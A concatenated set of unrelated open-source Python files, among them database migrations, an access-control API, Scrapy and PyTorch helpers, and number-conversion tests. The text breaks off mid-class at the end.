op.create_foreign_key('releases_tvshow_id_fkey', 'releases', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('episodes_tvshow_id_fkey', 'episodes', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('dbids_tvshow_id_fkey', 'dbids', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('dbids_movie_id_fkey', 'dbids', 'movies', ['movie_id'], ['id'])
bind.execute("select setval('dbids_id_seq', (select max(id) from dbids));")
bind.execute("select setval('tvshows_id_seq', (select max(id) from tvshows));")
bind.execute("select setval('movies_id_seq', (select max(id) from movies));")
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('movies', 'id',
existing_type=sa.Integer(),
type_=sa.VARCHAR(length=20),
existing_nullable=False)
op.drop_index(op.f('ix_dbids_tvshow_id'), table_name='dbids')
op.drop_index(op.f('ix_dbids_movie_id'), table_name='dbids')
op.drop_index('idx_db_id_db', table_name='dbids')
op.drop_table('dbids')
### end Alembic commands ###
|
src/api/accesscontrolprofile.py | piwaniuk/critic | 216 | 12664333 | # -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2015 the Critic contributors, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import api
class AccessControlProfileError(api.APIError):
"""Base exception for all errors related to the AccessControlProfile
class"""
pass
class InvalidAccessControlProfileId(AccessControlProfileError):
"""Raised when an invalid access control profile id is used"""
def __init__(self, value):
"""Constructor"""
super(InvalidAccessControlProfileId, self).__init__(
"Invalid access control profile id: %d" % value)
self.value = value
class AccessControlProfile(api.APIObject):
"""Representation of a an access control profile"""
RULE_VALUES = frozenset(["allow", "deny"])
@property
def id(self):
"""The profile's unique id"""
return self._impl.id
@property
def title(self):
"""The profile's title, or None"""
return self._impl.title
@property
def access_token(self):
"""The access token that owns this profile, or None"""
return self._impl.getAccessToken(self.critic)
class Category(object):
"""Representation of an access control category
Each category is controlled by a rule ("allow" or "deny") and a list
of exceptions (possibly empty). The effective policy is the rule,
unless an exception applies, in which case it's the opposite of the
rule."""
def __init__(self, rule, exceptions):
self.rule = rule
self.exceptions = exceptions
class HTTPException(object):
"""Representation of an exception for the "http" category
The exception consists of the HTTP request method and a regular
expression that must match the entire request path."""
REQUEST_METHODS = frozenset(["GET", "HEAD", "OPTIONS",
"POST", "PUT", "DELETE"])
def __init__(self, exception_id, request_method, path_pattern):
self.id = exception_id
self.request_method = request_method
self.path_pattern = path_pattern
@property
def http(self):
"""Access control category "http"
This category controls web frontend requests.
Exceptions are of the type HTTPException."""
return self._impl.getHTTP(self.critic)
class RepositoryException(object):
"""Representation of an exception for the "repositories" category
The exception consists of the access type ("read" or "modify") and the
repository."""
ACCESS_TYPES = frozenset(["read", "modify"])
def __init__(self, exception_id, access_type, repository):
self.id = exception_id
self.access_type = access_type
self.repository = repository
@property
def repositories(self):
"""Access control category "repositories"
This category controls access to Git repositories, both via the web
frontend and the Git hook. Note that read-only Git access over SSH
is not controlled by access control.
Exceptions are of the type RepositoryException."""
return self._impl.getRepositories(self.critic)
class ExtensionException(object):
"""Representation of an exception for the "extensions" category
The exception consists of the access type ("install" or "execute")
and the extension."""
ACCESS_TYPES = frozenset(["install", "execute"])
def __init__(self, exception_id, access_type, extension):
self.id = exception_id
self.access_type = access_type
self.extension = extension
@property
def extensions(self):
"""Access control category "extensions"
This category controls access to any functionality provided by an
extension.
Exceptions are of the type ExtensionException."""
return self._impl.getExtensions(self.critic)
def fetch(critic, profile_id):
"""Fetch an AccessControlProfile object with the given profile id"""
import api.impl
assert isinstance(critic, api.critic.Critic)
return api.impl.accesscontrolprofile.fetch(critic, int(profile_id))
def fetchAll(critic, title=None):
"""Fetch AccessControlProfile objects for all primary profiles in the system
    A profile is primary if it is not one of the additional-restrictions profiles
    imposed on accesses authenticated with an access token.
If |title| is not None, fetch only profiles with a matching title."""
import api.impl
assert isinstance(critic, api.critic.Critic)
if title is not None:
title = str(title)
return api.impl.accesscontrolprofile.fetchAll(critic, title)
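
# Usage sketch (illustrative, not part of the original module): given an
# api.critic.Critic session, profiles can be fetched by id or enumerated:
#
#   profile = api.accesscontrolprofile.fetch(critic, profile_id)
#   for p in api.accesscontrolprofile.fetchAll(critic, title="read-only"):
#       print(p.id, p.http.rule, len(p.http.exceptions))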
|
google_problems/problem_83.py | loftwah/Daily-Coding-Problem | 129 | 12664348 | """This problem was asked by Google.
You are writing an AI for a 2D map game. You are somewhere in a 2D grid,
and there are coins strewn about over the map.
Given the position of all the coins and your current position,
find the closest coin to you in terms of Manhattan distance.
That is, you can move around up, down, left, and right, but not diagonally.
If there are multiple possible closest coins, return any of them.
For example, given the following map, where you are x, coins are o,
and empty spaces are . (top left is 0, 0):
---------------------
| . | . | x | . | o |
---------------------
| o | . | . | . | . |
---------------------
| o | . | . | . | o |
---------------------
| . | . | o | . | . |
---------------------
return (0, 4), since that coin is closest.
This map would be represented in our question as:
Our position: (0, 2)
Coins: [(0, 4), (1, 0), (2, 0), (3, 2)]
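
One straightforward approach (illustrative sketch, not part of the original
problem statement) is to scan the coins and keep the one with the smallest
Manhattan distance:

    def closest_coin(position, coins):
        px, py = position
        return min(coins, key=lambda c: abs(c[0] - px) + abs(c[1] - py))

    closest_coin((0, 2), [(0, 4), (1, 0), (2, 0), (3, 2)])  # -> (0, 4)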
""" |
script/createTestData/main.py | bitkylin/ClusterDeviceManager | 379 | 12664364 | from utils import device_create
from utils import namecreater
from datetime import datetime
import random
db = device_create.get_creator("172.16.58.3", "bitkyTest")
device = db.Device
employee = db.Employee
device.drop()
employee.drop()
# Generate and insert the Device collection
result = device.insert_many(
[{'GroupId': group_id,
'DeviceId': device_id,
'ChargeStatus': 0,
'WorkStatus': 0,
'ChargeStatusTime': datetime.utcnow(),
'WorkStatusTime': datetime.utcnow(),
'RemainChargeTime': 500,
'CardNumber': hex(random.randint(1, 0xFFFFFFFF))[2:]}
for group_id in range(1, 101)
for device_id in range(1, 101)])
# Fetch the device documents back from the database
device_list = [device.find_one({'_id': device_id}) for device_id in result.inserted_ids]
# Insert the full employee document and link the device back to it
for device_item in device_list:
employee_item = namecreater.random_employee_from_device(device_item)
employee_item_result = employee.insert_one(employee_item)
device.update_one(device_item, {'$set': {'EmployeeObjectId': str(employee_item_result.inserted_id)}})
|
pyntcloud/neighbors/r_neighbors.py | bernssolg/pyntcloud-master | 1,142 | 12664370 | import numpy as np
def r_neighbors(kdtree, r):
""" Get indices of all neartest neighbors with a distance < r for each point
Parameters
----------
    kdtree: pyntcloud.structures.KDTree
The KDTree built on top of the points in point cloud
r: float
Maximum distance to consider a neighbor
Returns
-------
r_neighbors: (N, X) ndarray of lists
Where N = kdtree.data.shape[0]
len(X) varies for each point
"""
return np.array(kdtree.query_ball_tree(kdtree, r))
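
# Usage sketch (illustrative): only `query_ball_tree` is required, so any
# SciPy cKDTree-compatible tree works here, e.g.
#
#   from scipy.spatial import cKDTree
#   tree = cKDTree(points)                 # points: (N, 3) ndarray
#   neighbors = r_neighbors(tree, r=0.5)
#   print(neighbors[0])                    # indices of points within 0.5 of point 0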
|
Trakttv.bundle/Contents/Libraries/Shared/exception_wrappers/manager.py | disrupted/Trakttv.bundle | 1,346 | 12664374 | from pyemitter import Emitter
class ExceptionSource(object):
APSW = 'apsw'
Peewee = 'peewee'
class Manager(Emitter):
def add(self, source, exc_info, name=None):
if not exc_info or len(exc_info) != 3:
raise ValueError('Invalid value provided for the "exc_info" parameter')
# Retrieve error message
message = self._get_message(exc_info[1], name)
# Emit event
self.emit('exception', source, message, exc_info)
def _get_message(self, exception, name=None):
if name:
name_cap = name.capitalize()
else:
name = '<unknown>'
name_cap = '<unknown>'
# Retrieve exception message
ex_message = self._clean_exception_message(exception, exception.message)
# Map exception to a more helpful message
key = '%s.%s' % (
type(exception).__module__,
type(exception).__name__
)
if key == 'exceptions.ImportError':
return 'Unable to import the %s library (%s)' % (name, ex_message)
if key == 'apsw.CantOpenError':
return 'Unable to open %s (%s)' % (name, ex_message)
if key == 'apsw.CorruptError':
return '%s is corrupt (%s)' % (name_cap, ex_message)
if key == 'apsw.FullError':
return 'Drive containing the %s is full (%s)' % (name, ex_message)
if key == 'apsw.IOError':
return '%s raised an input/output error (%s)' % (name_cap, ex_message)
if key == 'apsw.NotADBError':
return '%s doesn\'t have a valid SQLite header (%s)' % (name_cap, ex_message)
if key == 'apsw.PermissionsError':
return 'Access denied to the %s (%s)' % (name, ex_message)
if key == 'apsw.ReadOnlyError':
return 'Unable to write to the %s (%s)' % (name, ex_message)
# Unknown exception
return '<%s> (%s)' % (key, ex_message)
@classmethod
def _clean_exception_message(cls, ex, message):
if not message:
return message
# ImportError
if isinstance(ex, ImportError) and ':' in message and (message.startswith('/') or message.startswith('./')):
# Strip path from message (if it looks like a path)
return message[message.index(':') + 1:].strip().capitalize()
# Strip exception type prefix from message
        prefix = type(ex).__name__ + ':'
        if message.startswith(prefix):
            message = message[len(prefix):]
        return message.strip()
# Construct default manager
ExceptionWrapper = Manager()
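
# Usage sketch (illustrative): consumers subscribe to the 'exception' event and
# receive the source, the friendly message and the original exc_info tuple:
#
#   def on_exception(source, message, exc_info):
#       log.error('%s error: %s', source, message, exc_info=exc_info)
#
#   ExceptionWrapper.on('exception', on_exception)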
|
idiot/checks/firewall.py | snare/idiot | 145 | 12664376 | """
Firewall check for Idiot.
"""
import biplist
import idiot
from idiot import CheckPlugin
class FirewallCheck(CheckPlugin):
name = "Firewall"
def run(self):
try:
d = biplist.readPlist('/Library/Preferences/com.apple.alf.plist')
enabled = (d['globalstate'] >= 1)
except:
return (False, "failed to read firewall config plist")
return (enabled, "{}".format("enabled" if enabled else "disabled"))
if __name__ == "__main__":
print(FirewallCheck().run())
|
migrations/versions/5d3c326dd901_add_created_and_updated_date_to_notebook.py | snowdensb/braindump | 631 | 12664377 | """Add Created and Updated date to Notebook
Revision ID: 5d3c326dd901
Revises: <PASSWORD>
Create Date: 2016-08-29 10:39:23.609605
"""
# revision identifiers, used by Alembic.
revision = '5d3c326dd901'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('notebooks', sa.Column('created_date', sa.DateTime(), nullable=True))
op.add_column('notebooks', sa.Column('updated_date', sa.DateTime(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('notebooks', 'updated_date')
op.drop_column('notebooks', 'created_date')
### end Alembic commands ###
|
hata/discord/embed/__init__.py | ToxicKidz/hata | 173 | 12664383 | from .embed import *
from .embed_base import *
from .embed_core import *
__all__ = (
*embed.__all__,
*embed_base.__all__,
*embed_core.__all__,
)
|
pyhashcat/sre_yield/tests/test_fastdivmod.py | security-geeks/hacking-tools | 198 | 12664390 | #!/usr/bin/env python3
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import random
import itertools
import unittest
from sre_yield.fastdivmod import divmod_iter_chunking, divmod_iter_basic, powersum
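
# Both divmod_iter variants yield the base-`base` digits of a number starting with
# the least significant digit, e.g. list(divmod_iter_basic(1234, 10)) == [4, 3, 2, 1];
# the chunking variant returns the same digits but extracts several per division,
# which is why its chunk argument must be a power of the base.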
class FastDivmodTest(unittest.TestCase):
def test_divmod_iter_basic(self):
v = divmod_iter_basic(1234, 10)
self.assertEqual([4, 3, 2, 1], list(v))
def test_basics(self):
v = divmod_iter_chunking(1234, 10, 10)
self.assertEqual([4, 3, 2, 1], list(v))
v = divmod_iter_chunking(1234, 10, 100)
self.assertEqual([4, 3, 2, 1], list(v))
v = divmod_iter_chunking(1234, 10, 1000)
self.assertEqual([4, 3, 2, 1], list(v))
def test_bad_chunk_sizes(self):
g = divmod_iter_chunking(1234, 10, 11)
self.assertRaises(ValueError, g.__next__)
def test_huge_number_1(self):
v = divmod_iter_chunking(70110209207109374, 255)
self.assertEqual([254, 254, 254, 254, 254, 254, 254], list(v))
def test_huge_number_2(self):
bignum = 1162523670191533212890624
assert 255**11 > bignum
v = divmod_iter_chunking(bignum, 255, 255**11)
self.assertEqual([254, 254, 254, 254, 254, 254, 254, 254, 254, 254], list(map(int, v)))
assert 255**9 < bignum
v = divmod_iter_chunking(bignum, 255, 255**9)
self.assertEqual([254, 254, 254, 254, 254, 254, 254, 254, 254, 254], list(map(int, v)))
def test_huge_number_3(self):
# this comes from '(?:[a-z]{,100}){,1000}'
bignum = '''
139213503685244597631306906207129822718492493625765750638187
422145221183403064209962632287600238213133585396115931858640
397088297104215182062999160404977511404583694567955555693092
391036971333019826503501322158903350288733318674828830355923
498349990520184425817007399901916816311858669171276285561444
611974044222858238401727502198428055979152449344112286300623
398354626165755088011934430203904483146569680889715180212280
311248065736587077721378474313074197745251681417858985013997
376497357630123665969920348446238536919778668008199819062912
209813948299604964182291901185954692403715976394605180757601
560022975631875217270554188664960698779556224408710087910153
388864065024676909905249179066904314719710199479087036266636
486812383614637270104664243861433698340337270580924018081122
972273102228069375608688078248241826230313720562480029591592
545905659922877348183737039792218885258459176312595646776711
788617588135808104772314342665930082373643028802685991791918
926674139428325541968355964156198980323655477930065908769084
934150892324757190759583195473467803980939672995083413559493
917611589310185589660702265554321021096049823204800056794809
973664250322419064982583391166478099231214825415574566705912
248472806014274543228627658095513550473626381033015045051724
852199012031842402809388416425577314128095191867797687492456
679728567750494783710131249615739065586686514755989308471095
118505256601463774083310772237026000
'''.replace(' ', '').replace('\n', '')
bignum = int(bignum)
bignum2 = 3268647867246256383381332100041691484373976788312974266629140102414955744756908184404049903032490380904202638084876187965749304595652472251350
v = divmod_iter_chunking(bignum, bignum2)
# there are at least 3 terms
next(v)
next(v)
next(v)
for i in v:
pass
# ...and it finishes
def test_correctness_big_numbers():
random.seed(1)
for _ in range(100):
x = random.randint(1, 2**32)
for base in (2, 10, 255, 256):
for chunk in (base, base**2, base**3, base**4):
yield runner, x, base, chunk
for _ in range(10):
x = random.randint(1, 2**32) * sys.maxsize ** 6
for base in (2, 10, 255, 256):
for chunk in (base, base**2, base**3, base**4):
yield runner, x, base, chunk
def runner(x, base, chunk):
for i, j in itertools.zip_longest(divmod_iter_chunking(x, base, chunk), divmod_iter_basic(x, base)):
if i is None:
print("phooey")
else:
assert i == j
def test_powersum():
for base in (1, 2, 7, 256):
yield powersum_runner, base, 0, 0
yield powersum_runner, base, 0, 1
yield powersum_runner, base, 1, 2
yield powersum_runner, base, 1, 10
yield powersum_runner, base, 99, 104
yield powersum_runner, base, 1, 2**14
def powersum_runner(base, low, high):
expected = sum([base ** i for i in range(low, high+1)])
actual = powersum(base, low, high)
assert expected == actual
|
alipay/aop/api/domain/AlipayGongyiModelTest.py | antopen/alipay-sdk-python-all | 213 | 12664403 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayGongyiUserInfoTest import AlipayGongyiUserInfoTest
class AlipayGongyiModelTest(object):
def __init__(self):
self._buyer = None
self._buyer_email = None
self._price = None
self._seller = None
self._seller_email = None
self._userinfo = None
@property
def buyer(self):
return self._buyer
@buyer.setter
def buyer(self, value):
self._buyer = value
@property
def buyer_email(self):
return self._buyer_email
@buyer_email.setter
def buyer_email(self, value):
self._buyer_email = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def seller(self):
return self._seller
@seller.setter
def seller(self, value):
self._seller = value
@property
def seller_email(self):
return self._seller_email
@seller_email.setter
def seller_email(self, value):
self._seller_email = value
@property
def userinfo(self):
return self._userinfo
@userinfo.setter
def userinfo(self, value):
if isinstance(value, AlipayGongyiUserInfoTest):
self._userinfo = value
else:
self._userinfo = AlipayGongyiUserInfoTest.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.buyer:
if hasattr(self.buyer, 'to_alipay_dict'):
params['buyer'] = self.buyer.to_alipay_dict()
else:
params['buyer'] = self.buyer
if self.buyer_email:
if hasattr(self.buyer_email, 'to_alipay_dict'):
params['buyer_email'] = self.buyer_email.to_alipay_dict()
else:
params['buyer_email'] = self.buyer_email
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.seller:
if hasattr(self.seller, 'to_alipay_dict'):
params['seller'] = self.seller.to_alipay_dict()
else:
params['seller'] = self.seller
if self.seller_email:
if hasattr(self.seller_email, 'to_alipay_dict'):
params['seller_email'] = self.seller_email.to_alipay_dict()
else:
params['seller_email'] = self.seller_email
if self.userinfo:
if hasattr(self.userinfo, 'to_alipay_dict'):
params['userinfo'] = self.userinfo.to_alipay_dict()
else:
params['userinfo'] = self.userinfo
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayGongyiModelTest()
if 'buyer' in d:
o.buyer = d['buyer']
if 'buyer_email' in d:
o.buyer_email = d['buyer_email']
if 'price' in d:
o.price = d['price']
if 'seller' in d:
o.seller = d['seller']
if 'seller_email' in d:
o.seller_email = d['seller_email']
if 'userinfo' in d:
o.userinfo = d['userinfo']
return o
|
crawler/gather/middlewares.py | shifei123/test | 283 | 12664417 | # -*-coding:utf-8-*-
from scrapy import signals
from scrapy.downloadermiddlewares.useragent import UserAgentMiddleware
import random
class RandomUserAgentMiddleware(UserAgentMiddleware):
def __init__(self, user_agent='Scrapy', user_agent_list=None):
super(RandomUserAgentMiddleware, self).__init__(user_agent=user_agent)
self.user_agent_list = user_agent_list
@classmethod
def from_crawler(cls, crawler):
user_agent_list = crawler.settings.get('USER_AGENT_LIST', None)
if not user_agent_list:
user_agent_file = crawler.settings.get('USER_AGENT_FILE', None)
if user_agent_file:
with open(user_agent_file) as fr:
                user_agent_list = [line.strip() for line in fr if line.strip()]
o = cls(crawler.settings['USER_AGENT'], user_agent_list)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
return o
def process_request(self, request, spider):
        if isinstance(self.user_agent_list, (list, tuple)) and len(self.user_agent_list) > 0:
user_agent = random.choice(self.user_agent_list)
else:
user_agent = self.user_agent
request.headers.setdefault(b'User-Agent', user_agent)
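
# Example settings (sketch; adjust the dotted path to match your project layout):
#
#   USER_AGENT_LIST = (
#       'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
#       'Mozilla/5.0 (X11; Linux x86_64)',
#   )
#   # or: USER_AGENT_FILE = 'user_agents.txt'   # one user agent per line
#   DOWNLOADER_MIDDLEWARES = {
#       'gather.middlewares.RandomUserAgentMiddleware': 400,
#   }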
|
roll_engine/models/batches.py | js882829/tars | 371 | 12664431 | from __future__ import absolute_import
from django.db import models
from roll_engine.fsm import BatchFSMixin
from roll_engine.mixins import BatchMixin
from roll_engine.exceptions import DeploymentError
from .base import FSMedModel, InheritanceMetaclass
class DeploymentBatch(BatchMixin, BatchFSMixin, FSMedModel):
__metaclass__ = InheritanceMetaclass
index = models.IntegerField(null=True)
pause_time = models.IntegerField(default=0)
FORT_INDEX = 1
class Meta:
abstract = True
@classmethod
def validate_meta(cls):
pass
def get_object(self):
return self
def is_fort_batch(self):
raise DeploymentError('return boolean to indicate whether a fort batch')
def save(self, *args, **kwargs):
if self.pk is None:
if self.deployment is not None:
self.pause_time = self.deployment.config.pause_time
super(DeploymentBatch, self).save(*args, **kwargs)
def is_reach_up_server_threshold(self):
return False
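
# Sketch of a concrete subclass (hypothetical; the deployment relation and model
# names below are illustrative only):
#
#   class MyDeploymentBatch(DeploymentBatch):
#       deployment = models.ForeignKey('MyDeployment', related_name='batches')
#
#       def is_fort_batch(self):
#           return self.index == self.FORT_INDEX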
|
sky130/custom/scripts/sp_to_spice.py | d-m-bailey/open_pdks | 103 | 12664449 | #!/usr/bin/env python3
#
# sp_to_spice ---
#
# This script runs as a filter to foundry_install.sh and converts file
# names ending with ".sp" to ".spice". If the file has multiple extensions
# then all are stripped before adding ".spice".
#
# This script is a filter to be run by setting the name of this script as
# the value to "filter=" for the model install in the sky130 Makefile.
import os
import sys
def filter(inname):
filepath = os.path.split(inname)[0]
filename = os.path.split(inname)[1]
filebits = filename.split('.')
newname = filebits[0] + '.spice'
outname = os.path.join(filepath, newname)
if not os.path.isfile(inname):
print('No such file ' + inname)
return 1
print('Renaming file ' + filename + ' to ' + newname)
os.rename(inname, outname)
return 0
if __name__ == '__main__':
# This script expects to get one argument, which is the input file.
# The script renames the file.
options = []
arguments = []
for item in sys.argv[1:]:
if item.find('-', 0) == 0:
options.append(item[1:])
else:
arguments.append(item)
if len(arguments) > 0:
infilename = arguments[0]
else:
sys.exit(1)
result = filter(infilename)
sys.exit(result)
|
torchfusion/layers/layers.py | fbremer/TorchFusion | 250 | 12664478 | import torch.nn as nn
import torch
import torch.nn.functional as F
from torchfusion.initializers import *
from torch.nn.modules.conv import _ConvNd,_ConvTransposeMixin,_single,_pair,_triple
from torch.nn.modules.batchnorm import _BatchNorm
class MultiSequential(nn.Sequential):
def __init__(self, *args):
super(MultiSequential, self).__init__(*args)
def forward(self, *input):
for module in self._modules.values():
input = module(*input)
return input
class Conv1d(nn.Conv1d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv1d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Conv2d(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv2d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Conv3d(nn.Conv3d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv3d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv1d(nn.Conv1d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv1d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv2d(nn.Conv2d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv2d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
                                             padding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv3d(nn.Conv3d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv3d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
                                             padding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose1d(nn.ConvTranspose1d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose1d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose2d(nn.ConvTranspose2d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose2d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose3d(nn.ConvTranspose3d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose3d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose1d(nn.ConvTranspose1d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose1d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose2d(nn.ConvTranspose2d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose2d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose3d(nn.ConvTranspose3d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose3d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Linear(nn.Linear):
def __init__(self,in_features,out_features,bias=True,weight_init=Xavier_Normal(),bias_init=Zeros()):
"""
:param in_features:
:param out_features:
:param bias:
:param weight_init:
:param bias_init:
"""
super(Linear,self).__init__(in_features,out_features,bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Flatten(nn.Module):
def __init__(self,batch_first=True):
"""
:param batch_first:
"""
super(Flatten,self).__init__()
self.batch_first = batch_first
def forward(self,inputs):
if self.batch_first:
size = torch.prod(torch.LongTensor(list(inputs.size())[1:])).item()
return inputs.view(-1,size)
else:
size = torch.prod(torch.LongTensor(list(inputs.size())[:len(inputs.size())-1])).item()
return inputs.view(size,-1)
class Reshape(nn.Module):
def __init__(self,output_shape,batch_first=True):
"""
:param output_shape:
:param batch_first:
"""
super(Reshape,self).__init__()
self.output_shape = output_shape
self.batch_first = batch_first
def forward(self,inputs):
if isinstance(self.output_shape,int):
size = [self.output_shape]
else:
size = list(self.output_shape)
if self.batch_first:
input_total_size = torch.prod(torch.LongTensor(list(inputs.size())[1:])).item()
else:
input_total_size = torch.prod(torch.LongTensor(list(inputs.size())[:len(inputs.size())-1])).item()
target_total_size = torch.prod(torch.LongTensor(size)).item()
if input_total_size != target_total_size:
raise ValueError(" Reshape must preserve total dimension, input size: {} and output size: {}".format(input.size()[1:],self.output_shape))
size = list(size)
if self.batch_first:
size = tuple([-1] + size)
else:
size = tuple(size + [-1])
outputs = inputs.view(size)
return outputs
class _GlobalPoolNd(nn.Module):
def __init__(self,flatten=True):
"""
:param flatten:
"""
super(_GlobalPoolNd,self).__init__()
self.flatten = flatten
def pool(self,input):
"""
:param input:
:return:
"""
raise NotImplementedError()
def forward(self,input):
"""
:param input:
:return:
"""
input = self.pool(input)
size_0 = input.size(1)
return input.view(-1,size_0) if self.flatten else input
class GlobalAvgPool1d(_GlobalPoolNd):
def __init__(self,flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool1d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool1d(input,1)
class GlobalAvgPool2d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool2d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool2d(input,1)
class GlobalAvgPool3d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool3d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool3d(input,1)
class GlobalMaxPool1d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool1d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool1d(input, 1)
class GlobalMaxPool2d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool2d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool2d(input, 1)
class GlobalMaxPool3d(_GlobalPoolNd):
